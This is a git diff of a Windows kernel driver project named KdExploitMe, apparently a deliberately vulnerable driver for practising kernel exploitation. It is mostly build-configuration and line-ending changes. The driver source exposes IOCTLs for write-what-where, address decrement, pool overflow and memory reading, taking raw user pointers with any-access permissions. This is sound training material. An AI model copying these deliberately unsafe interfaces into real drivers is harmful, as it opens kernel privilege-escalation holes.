- IoCompleteRequest(Irp, IO_NO_INCREMENT);
-
- return ntStatus;
-}
-
-VOID
-PrintIrpInfo(
-PIRP Irp)
-{
- PIO_STACK_LOCATION irpSp;
- irpSp = IoGetCurrentIrpStackLocation(Irp);
-
- PAGED_CODE();
-
- PrettyDbgPrint(("\tIrp->AssociatedIrp.SystemBuffer = 0x%p\n",
- Irp->AssociatedIrp.SystemBuffer));
- PrettyDbgPrint(("\tIrp->UserBuffer = 0x%p\n", Irp->UserBuffer));
- PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.Type3InputBuffer = 0x%p\n",
- irpSp->Parameters.DeviceIoControl.Type3InputBuffer));
- PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.InputBufferLength = %d\n",
- irpSp->Parameters.DeviceIoControl.InputBufferLength));
- PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.OutputBufferLength = %d\n",
- irpSp->Parameters.DeviceIoControl.OutputBufferLength));
- return;
-}
-
-VOID
-PrintChars(
-_In_reads_(CountChars) PCHAR BufferAddress,
-_In_ size_t CountChars
-)
-{
- PAGED_CODE();
-
- if (CountChars) {
-
- while (CountChars--) {
-
- if (*BufferAddress > 31
- && *BufferAddress != 127) {
-
- KdPrint(("%c", *BufferAddress));
-
- }
- else {
-
- KdPrint(("."));
-
- }
- BufferAddress++;
- }
- KdPrint(("\n"));
- }
- return;
-}
-
-
+//
+// Include files.
+//
+
+#include // various NT definitions
+#include
+
+#include "KdExploitMe.h"
+#include "HandleIOCTL.h"
+#include "Structures.h"
+
+#define NT_DEVICE_NAME L"\\Device\\KdExploitMe"
+#define DOS_DEVICE_NAME L"\\DosDevices\\KdExploitMe"
+
+#if DBG
+#define PrettyDbgPrint(_x_) \
+ DbgPrint("KdExploitMe.SYS: "); \
+ DbgPrint _x_;
+
+#else
+#define PrettyDbgPrint(_x_)
+#endif
+
+//
+// Device driver routine declarations.
+//
+
+DRIVER_INITIALIZE DriverEntry;
+
+_Dispatch_type_(IRP_MJ_CREATE)
+_Dispatch_type_(IRP_MJ_CLOSE)
+DRIVER_DISPATCH DriverCreateClose;
+
+_Dispatch_type_(IRP_MJ_DEVICE_CONTROL)
+DRIVER_DISPATCH DriverDeviceControl;
+
+DRIVER_UNLOAD DriverUnloadControl;
+
+VOID
+PrintIrpInfo(
+PIRP Irp
+);
+VOID
+PrintChars(
+_In_reads_(CountChars) PCHAR BufferAddress,
+_In_ size_t CountChars
+);
+
+
+
+NTSTATUS
+DriverEntry(
+_In_ PDRIVER_OBJECT DriverObject,
+_In_ PUNICODE_STRING RegistryPath
+)
+/*++
+
+Routine Description:
+This routine is called by the Operating System to initialize the driver.
+
+It creates the device object, fills in the dispatch entry points and
+completes the initialization.
+
+Arguments:
+DriverObject - a pointer to the object that represents this device
+driver.
+
+RegistryPath - a pointer to our Services key in the registry.
+
+Return Value:
+STATUS_SUCCESS if initialized; an error otherwise.
+
+--*/
+
+{
+ NTSTATUS ntStatus;
+ UNICODE_STRING ntUnicodeString; // NT Device Name "\Device\WDMDriver"
+ UNICODE_STRING ntWin32NameString; // Win32 Name "\DosDevices\IoctlTest"
+ PDEVICE_OBJECT deviceObject = NULL; // ptr to device object
+
+ UNREFERENCED_PARAMETER(RegistryPath);
+
+ RtlInitUnicodeString(&ntUnicodeString, NT_DEVICE_NAME);
+
+ ntStatus = IoCreateDevice(
+ DriverObject, // Our Driver Object
+ 0, // We don't use a device extension
+ &ntUnicodeString, // Device name "\Device\KdExploitMe"
+ FILE_DEVICE_UNKNOWN, // Device type
+ FILE_DEVICE_SECURE_OPEN, // Device characteristics
+ FALSE, // Not an exclusive device
+ &deviceObject); // Returned ptr to Device Object
+
+ if (!NT_SUCCESS(ntStatus))
+ {
+ PrettyDbgPrint(("Couldn't create the device object\n"));
+ return ntStatus;
+ }
+
+ //
+ // Initialize the driver object with this driver's entry points.
+ //
+
+ DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverCreateClose;
+ DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverCreateClose;
+ DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDeviceControl;
+ DriverObject->DriverUnload = DriverUnloadControl;
+
+ //
+ // Initialize a Unicode String containing the Win32 name
+ // for our device.
+ //
+
+ RtlInitUnicodeString(&ntWin32NameString, DOS_DEVICE_NAME);
+
+ //
+ // Create a symbolic link between our device name and the Win32 name
+ //
+
+ ntStatus = IoCreateSymbolicLink(
+ &ntWin32NameString, &ntUnicodeString);
+
+ if (!NT_SUCCESS(ntStatus))
+ {
+ //
+ // Delete everything that this routine has allocated.
+ //
+ PrettyDbgPrint(("Couldn't create symbolic link\n"));
+ IoDeleteDevice(deviceObject);
+ }
+
+
+ return ntStatus;
+}
+
+
+NTSTATUS
+DriverCreateClose(
+PDEVICE_OBJECT DeviceObject,
+PIRP Irp
+)
+/*++
+
+Routine Description:
+
+This routine is called by the I/O system when the KdExploitMe is opened or
+closed.
+
+No action is performed other than completing the request successfully.
+
+Arguments:
+
+DeviceObject - a pointer to the object that represents the device
+that I/O is to be done on.
+
+Irp - a pointer to the I/O Request Packet for this request.
+
+Return Value:
+
+NT status code
+
+--*/
+
+{
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+ PAGED_CODE();
+
+ Irp->IoStatus.Status = STATUS_SUCCESS;
+ Irp->IoStatus.Information = 0;
+
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+
+ return STATUS_SUCCESS;
+}
+
+VOID
+DriverUnloadControl(
+_In_ PDRIVER_OBJECT DriverObject
+)
+/*++
+
+Routine Description:
+
+This routine is called by the I/O system to unload the driver.
+
+Any resources previously allocated must be freed.
+
+Arguments:
+
+DriverObject - a pointer to the object that represents our driver.
+
+Return Value:
+
+None
+--*/
+
+{
+ PDEVICE_OBJECT deviceObject = DriverObject->DeviceObject;
+ UNICODE_STRING uniWin32NameString;
+
+ PAGED_CODE();
+
+ //
+ // Create counted string version of our Win32 device name.
+ //
+
+ RtlInitUnicodeString(&uniWin32NameString, DOS_DEVICE_NAME);
+
+
+ //
+ // Delete the link from our device name to a name in the Win32 namespace.
+ //
+
+ IoDeleteSymbolicLink(&uniWin32NameString);
+
+ if (deviceObject != NULL)
+ {
+ IoDeleteDevice(deviceObject);
+ }
+
+
+
+}
+
+NTSTATUS
+DriverDeviceControl(
+PDEVICE_OBJECT DeviceObject,
+PIRP Irp
+)
+
+/*++
+
+Routine Description:
+
+This routine is called by the I/O system to perform a device I/O
+control function.
+
+Arguments:
+
+DeviceObject - a pointer to the object that represents the device
+that I/O is to be done on.
+
+Irp - a pointer to the I/O Request Packet for this request.
+
+Return Value:
+
+NT status code
+
+--*/
+
+{
+ PIO_STACK_LOCATION irpSp;// Pointer to current stack location
+ NTSTATUS ntStatus = STATUS_SUCCESS;// Assume success
+ ULONG inBufLength; // Input buffer length
+ ULONG outBufLength; // Output buffer length
+ PCHAR inBuf; // pointer to Input and output buffer
+// PCHAR data = "This String is from Device Driver !!!";
+// size_t datalen = strlen(data) + 1;//Length of data including null
+// PMDL mdl = NULL;
+// PCHAR buffer = NULL;
+
+ UNREFERENCED_PARAMETER(DeviceObject);
+
+ PAGED_CODE();
+
+ irpSp = IoGetCurrentIrpStackLocation(Irp);
+ inBufLength = irpSp->Parameters.DeviceIoControl.InputBufferLength;
+ outBufLength = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
+
+ if (!inBufLength || !outBufLength)
+ {
+ ntStatus = STATUS_INVALID_PARAMETER;
+ goto End;
+ }
+
+ //
+ // Determine which I/O control code was specified.
+ //
+
+ switch (irpSp->Parameters.DeviceIoControl.IoControlCode)
+ {
+ case IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE:
+ inBuf = (PCHAR)irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
+
+ ntStatus = WriteWhatWhere(DeviceObject, Irp, (PDATACOPY)inBuf);
+
+ break;
+ case IOCTL_KDEXPLOITME_METHOD_DECADDRESS:
+ inBuf = (PCHAR)irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
+
+ ntStatus = DecAddress(DeviceObject, Irp, (PDECADDRESS)inBuf);
+ break;
+ case IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL:
+ inBuf = (PCHAR)Irp->AssociatedIrp.SystemBuffer;
+ ntStatus = OverflowPool(DeviceObject, Irp, (POVERFLOW_PAGEDPOOL)inBuf);
+ break;
+ case IOCTL_KDEXPLOITME_METHOD_READMEM:
+ inBuf = (PCHAR)irpSp->Parameters.DeviceIoControl.Type3InputBuffer;
+ ntStatus = Leak(DeviceObject, Irp, inBuf, irpSp->Parameters.DeviceIoControl.InputBufferLength, Irp->UserBuffer, irpSp->Parameters.DeviceIoControl.OutputBufferLength);
+ break;
+ default:
+
+ //
+ // The specified I/O control code is unrecognized by this driver.
+ //
+
+ ntStatus = STATUS_INVALID_DEVICE_REQUEST;
+ PrettyDbgPrint(("ERROR: unrecognized IOCTL %x\n",
+ irpSp->Parameters.DeviceIoControl.IoControlCode));
+ break;
+ }
+
+End:
+ //
+ // Finish the I/O operation by simply completing the packet and returning
+ // the same status as in the packet itself.
+ //
+
+ Irp->IoStatus.Status = ntStatus;
+
+ IoCompleteRequest(Irp, IO_NO_INCREMENT);
+
+ return ntStatus;
+}
+
+VOID
+PrintIrpInfo(
+PIRP Irp)
+{
+ PIO_STACK_LOCATION irpSp;
+ irpSp = IoGetCurrentIrpStackLocation(Irp);
+
+ PAGED_CODE();
+
+ PrettyDbgPrint(("\tIrp->AssociatedIrp.SystemBuffer = 0x%p\n",
+ Irp->AssociatedIrp.SystemBuffer));
+ PrettyDbgPrint(("\tIrp->UserBuffer = 0x%p\n", Irp->UserBuffer));
+ PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.Type3InputBuffer = 0x%p\n",
+ irpSp->Parameters.DeviceIoControl.Type3InputBuffer));
+ PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.InputBufferLength = %d\n",
+ irpSp->Parameters.DeviceIoControl.InputBufferLength));
+ PrettyDbgPrint(("\tirpSp->Parameters.DeviceIoControl.OutputBufferLength = %d\n",
+ irpSp->Parameters.DeviceIoControl.OutputBufferLength));
+ return;
+}
+
+VOID
+PrintChars(
+_In_reads_(CountChars) PCHAR BufferAddress,
+_In_ size_t CountChars
+)
+{
+ PAGED_CODE();
+
+ if (CountChars) {
+
+ while (CountChars--) {
+
+ if (*BufferAddress > 31
+ && *BufferAddress != 127) {
+
+ KdPrint(("%c", *BufferAddress));
+
+ }
+ else {
+
+ KdPrint(("."));
+
+ }
+ BufferAddress++;
+ }
+ KdPrint(("\n"));
+ }
+ return;
+}
+
+
diff --git a/KdExploitMe/KdExploitMe.h b/KdExploitMe/KdExploitMe.h
index b9b7687..d457f9e 100644
--- a/KdExploitMe/KdExploitMe.h
+++ b/KdExploitMe/KdExploitMe.h
@@ -1,25 +1,25 @@
-//
-// Device type -- in the "User Defined" range."
-//
-#define KDEXPLOITME_TYPE 40000
-//
-// The IOCTL function codes from 0x800 to 0xFFF are for customer use.
-//
-#define IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE \
- CTL_CODE(KDEXPLOITME_TYPE, 0x900, METHOD_NEITHER, FILE_ANY_ACCESS)
-
-#define IOCTL_KDEXPLOITME_METHOD_DECADDRESS \
- CTL_CODE(KDEXPLOITME_TYPE, 0x901, METHOD_NEITHER, FILE_ANY_ACCESS)
-
-#define IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL \
- CTL_CODE(KDEXPLOITME_TYPE, 0x902, METHOD_BUFFERED, FILE_ANY_ACCESS)
-
-#define IOCTL_KDEXPLOITME_METHOD_READMEM \
- CTL_CODE(KDEXPLOITME_TYPE, 0x903, METHOD_NEITHER, FILE_ANY_ACCESS)
-
-
-#define DRIVER_FUNC_INSTALL 0x01
-#define DRIVER_FUNC_REMOVE 0x02
-
-#define DRIVER_NAME "KdExploitMe"
-
+//
+// Device type -- in the "User Defined" range."
+//
+#define KDEXPLOITME_TYPE 40000
+//
+// The IOCTL function codes from 0x800 to 0xFFF are for customer use.
+//
+#define IOCTL_KDEXPLOITME_METHOD_WRITEWHATWHERE \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x900, METHOD_NEITHER, FILE_ANY_ACCESS)
+
+#define IOCTL_KDEXPLOITME_METHOD_DECADDRESS \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x901, METHOD_NEITHER, FILE_ANY_ACCESS)
+
+#define IOCTL_KDEXPLOITME_METHOD_OVERFLOWPOOL \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x902, METHOD_BUFFERED, FILE_ANY_ACCESS)
+
+#define IOCTL_KDEXPLOITME_METHOD_READMEM \
+ CTL_CODE(KDEXPLOITME_TYPE, 0x903, METHOD_NEITHER, FILE_ANY_ACCESS)
+
+
+#define DRIVER_FUNC_INSTALL 0x01
+#define DRIVER_FUNC_REMOVE 0x02
+
+#define DRIVER_NAME "KdExploitMe"
+
diff --git a/KdExploitMe/KdExploitMe.inf b/KdExploitMe/KdExploitMe.inf
index 6369283..230843c 100644
--- a/KdExploitMe/KdExploitMe.inf
+++ b/KdExploitMe/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NT$ARCH$
-
-[Standard.NT$ARCH$]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NT$ARCH$
+
+[Standard.NT$ARCH$]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/KdExploitMe.vcxproj b/KdExploitMe/KdExploitMe.vcxproj
index 6cefcf7..af96809 100644
--- a/KdExploitMe/KdExploitMe.vcxproj
+++ b/KdExploitMe/KdExploitMe.vcxproj
@@ -1,230 +1,289 @@
-
-
-
-
- Win8.1 Debug
- Win32
-
-
- Win8.1 Release
- Win32
-
-
- Win8 Debug
- Win32
-
-
- Win8 Release
- Win32
-
-
- Win7 Debug
- Win32
-
-
- Win7 Release
- Win32
-
-
- Win8.1 Debug
- x64
-
-
- Win8.1 Release
- x64
-
-
- Win8 Debug
- x64
-
-
- Win8 Release
- x64
-
-
- Win7 Debug
- x64
-
-
- Win7 Release
- x64
-
-
-
- {A239482B-8B6C-448F-969B-563E3B8DE701}
- {dd38f7fc-d7bd-488b-9242-7d8754cde80d}
- v4.5
- 11.0
- Win8.1 Debug
- Win32
- KdExploitMe
-
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- WindowsV6.3
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- WindowsV6.3
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows8
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- true
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
- Windows7
- false
- WindowsKernelModeDriver8.1
- Driver
- WDM
-
-
-
-
-
-
-
-
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
- DbgengKernelDebugger
-
-
-
- CompileAsC
-
-
-
-
- CompileAsC
-
-
-
-
- CompileAsC
-
-
-
-
- CompileAsC
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+
+
+
+
+ Win7 Debug
+ ARM64
+
+
+ Win7 Release
+ ARM64
+
+
+ Win8 Debug
+ ARM64
+
+
+ Win8 Release
+ ARM64
+
+
+ Win8.1 Debug
+ ARM64
+
+
+ Win8.1 Debug
+ Win32
+
+
+ Win8.1 Release
+ ARM64
+
+
+ Win8.1 Release
+ Win32
+
+
+ Win8 Debug
+ Win32
+
+
+ Win8 Release
+ Win32
+
+
+ Win7 Debug
+ Win32
+
+
+ Win7 Release
+ Win32
+
+
+ Win8.1 Debug
+ x64
+
+
+ Win8.1 Release
+ x64
+
+
+ Win8 Debug
+ x64
+
+
+ Win8 Release
+ x64
+
+
+ Win7 Debug
+ x64
+
+
+ Win7 Release
+ x64
+
+
+
+ {A239482B-8B6C-448F-969B-563E3B8DE701}
+ {dd38f7fc-d7bd-488b-9242-7d8754cde80d}
+ v4.5
+ 11.0
+ Win8.1 Debug
+ Win32
+ KdExploitMe
+ 10.0.26100.0
+
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ WindowsV6.3
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ WindowsV6.3
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows8
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ true
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ Windows7
+ false
+ WindowsKernelModeDriver10.0
+ Driver
+ WDM
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ v143
+
+
+ WindowsKernelModeDriver10.0
+
+
+
+
+
+
+
+
+
+ C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.26100.0\km\arm64;$(ExternalIncludePath)
+ C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.26100.0\km\arm64;$(IncludePath)
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+ DbgengKernelDebugger
+
+
+
+ CompileAsC
+
+
+
+
+ CompileAsC
+
+
+
+
+ CompileAsC
+
+
+
+
+ CompileAsC
+
+
+
+
+ C:\Program Files %28x86%29\Windows Kits\10\Include\10.0.26100.0\km;%(AdditionalIncludeDirectories)
+ _ARM64_;%(PreprocessorDefinitions)
+
+
+ DriverEntry
+ Console
+ ntoskrnl.lib;
+hal.lib;
+wdmsec.lib;%(AdditionalDependencies)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe/KdExploitMe.vcxproj.filters b/KdExploitMe/KdExploitMe.vcxproj.filters
index 1e9bbb1..4c38922 100644
--- a/KdExploitMe/KdExploitMe.vcxproj.filters
+++ b/KdExploitMe/KdExploitMe.vcxproj.filters
@@ -1,45 +1,45 @@
-
-
-
-
- {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
- cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
-
-
- {93995380-89BD-4b04-88EB-625FBE52EBFB}
- h;hpp;hxx;hm;inl;inc;xsd
-
-
- {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
- rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
-
-
- {8E41214B-6785-4CFE-B992-037D68949A14}
- inf;inv;inx;mof;mc;
-
-
-
-
- Driver Files
-
-
-
-
- Source Files
-
-
- Source Files
-
-
-
-
- Header Files
-
-
- Header Files
-
-
- Header Files
-
-
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hpp;hxx;hm;inl;inc;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+ {8E41214B-6785-4CFE-B992-037D68949A14}
+ inf;inv;inx;mof;mc;
+
+
+
+
+ Driver Files
+
+
+
+
+ Source Files
+
+
+ Source Files
+
+
+
+
+ Header Files
+
+
+ Header Files
+
+
+ Header Files
+
+
\ No newline at end of file
diff --git a/KdExploitMe/KdExploitMe.vcxproj.user b/KdExploitMe/KdExploitMe.vcxproj.user
new file mode 100644
index 0000000..0f14913
--- /dev/null
+++ b/KdExploitMe/KdExploitMe.vcxproj.user
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/KdExploitMe/Structures.h b/KdExploitMe/Structures.h
index 44184ae..e151520 100644
--- a/KdExploitMe/Structures.h
+++ b/KdExploitMe/Structures.h
@@ -1,27 +1,27 @@
-#pragma once
-
-
-#include
-#include
-
-
-typedef struct _DATACOPY
-{
- DWORD SourceLength;
- PVOID Source;
- DWORD DestLength;
- PVOID Dest;
-} DATACOPY, *PDATACOPY;
-
-typedef struct _DECADDRESS
-{
- BOOL Dec;
- size_t* Value;
-} DECADDRESS, *PDECADDRESS;
-
-typedef struct _OVERFLOW_PAGEDPOOL
-{
- POOL_TYPE PoolType;
- DWORD AllocationSize;
- UNICODE_STRING UserData;
-} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
+#pragma once
+
+
+#include
+#include
+
+
+typedef struct _DATACOPY
+{
+ DWORD SourceLength;
+ PVOID Source;
+ DWORD DestLength;
+ PVOID Dest;
+} DATACOPY, *PDATACOPY;
+
+typedef struct _DECADDRESS
+{
+ BOOL Dec;
+ size_t* Value;
+} DECADDRESS, *PDECADDRESS;
+
+typedef struct _OVERFLOW_PAGEDPOOL
+{
+ POOL_TYPE PoolType;
+ DWORD AllocationSize;
+ UNICODE_STRING UserData;
+} OVERFLOW_PAGEDPOOL, *POVERFLOW_PAGEDPOOL;
diff --git a/KdExploitMe/Win7Debug/KdExploitMe.inf b/KdExploitMe/Win7Debug/KdExploitMe.inf
index 2c8d443..584d879 100644
--- a/KdExploitMe/Win7Debug/KdExploitMe.inf
+++ b/KdExploitMe/Win7Debug/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.13.26.814
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.13.26.814
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
index 02e5dd3..63898e6 100644
--- a/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
+++ b/KdExploitMe/Win7Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Debug|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Debug|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe/Win7Release/KdExploitMe.inf b/KdExploitMe/Win7Release/KdExploitMe.inf
index 83e8244..b22e15f 100644
--- a/KdExploitMe/Win7Release/KdExploitMe.inf
+++ b/KdExploitMe/Win7Release/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,22.12.12.543
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,22.12.12.543
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
index bc243c7..80286fb 100644
--- a/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
+++ b/KdExploitMe/Win7Release/KdExploitMe.tlog/KdExploitMe.lastbuildstate
@@ -1,2 +1,2 @@
-#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
-Win7 Release|Win32|C:\Github\KdExploitMe\|
+#TargetFrameworkVersion=v4.5:PlatformToolSet=WindowsKernelModeDriver8.1:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit
+Win7 Release|Win32|C:\Github\KdExploitMe\|
diff --git a/KdExploitMe/Win8.1Debug/KdExploitMe.inf b/KdExploitMe/Win8.1Debug/KdExploitMe.inf
index bb8408a..d638688 100644
--- a/KdExploitMe/Win8.1Debug/KdExploitMe.inf
+++ b/KdExploitMe/Win8.1Debug/KdExploitMe.inf
@@ -1,32 +1,32 @@
-;
-; KdExploitMe.inf
-;
-
-[Version]
-Signature="$WINDOWS NT$"
-Class=
-ClassGuid=
-Provider=
-DriverVer=11/16/2014,21.57.22.901
-CatalogFile=
-
-[DestinationDirs]
-DefaultDestDir = 12
-
-
-[SourceDisksNames]
-1 = %DiskName%,,,""
-
-[SourceDisksFiles]
-
-
-[Manufacturer]
-%ManufacturerName%=Standard,NTx86
-
-[Standard.NTx86]
-
-
-[Strings]
-ManufacturerName=""
-ClassName=""
-DiskName="KdExploitMe Source Disk"
+;
+; KdExploitMe.inf
+;
+
+[Version]
+Signature="$WINDOWS NT$"
+Class=
+ClassGuid=
+Provider=
+DriverVer=11/16/2014,21.57.22.901
+CatalogFile=
+
+[DestinationDirs]
+DefaultDestDir = 12
+
+
+[SourceDisksNames]
+1 = %DiskName%,,,""
+
+[SourceDisksFiles]
+
+
+[Manufacturer]
+%ManufacturerName%=Standard,NTx86
+
+[Standard.NTx86]
+
+
+[Strings]
+ManufacturerName=""
+ClassName=""
+DiskName="KdExploitMe Source Disk"
diff --git a/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate b/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
index cd25adb..01347e1 100644
--- a/KdExploitMe/Win8.1Debug/KdExploitMe.tlog/KdExploitMe.lastbuildstate
